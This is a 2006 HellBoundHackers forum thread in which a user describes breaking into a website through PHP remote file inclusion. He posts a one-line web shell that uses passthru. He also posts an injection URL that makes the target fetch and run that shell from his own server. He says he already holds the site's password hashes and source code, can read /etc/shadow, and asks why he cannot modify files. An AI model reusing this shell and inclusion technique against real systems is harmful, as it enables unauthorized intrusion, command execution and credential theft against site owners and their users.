Follow us on Twitter!
Imagination is more valuable than knowledge - Albert Einstein
Tuesday, April 28, 2015
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 16
Guests Online: 15
TeamSpeak Online : 5 Members Online: 1

Registered Members: 88100
Newest Member: simrat
Latest Articles
Our sponsor needs your help!


One of our sponsors needs your help, http://www.virginmediabusiness.co.uk/pitch-to-rich/grow/krystal-hosting/
Go check out their video and Don't forget to vote !


~ Thanks for your help
HBH
View Thread

HellBound Hackers | Computer General | Web hacking

Author

next step


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-02-06 20:42
I recently found a web site vuln to php injection. but there are somethings that make no sense. I have the password hashes, i can read all the php sources i can see the files and directories. but...
the first thing is, lets say i have this code in http://myserver/cmd.php:
Code

<? passthru($cmd); ?>




when i inject it like this:
http://target.com/index.php?page=http://myserver/cmd.php?cmd=ls
it doesn't work, but when i change the source to:
Code

<? passthru("ls"); ?>




it works and shows the list of files.
i'm wondering why?? is there any problem with that php script??

secondly, it seems like i can access files and even etc/shadow but i can't edit/remove/make new files and directories.
can you explain why is it like this??

EDIT: never mind :)

GreyFox






Edited by on 06-02-06 01:37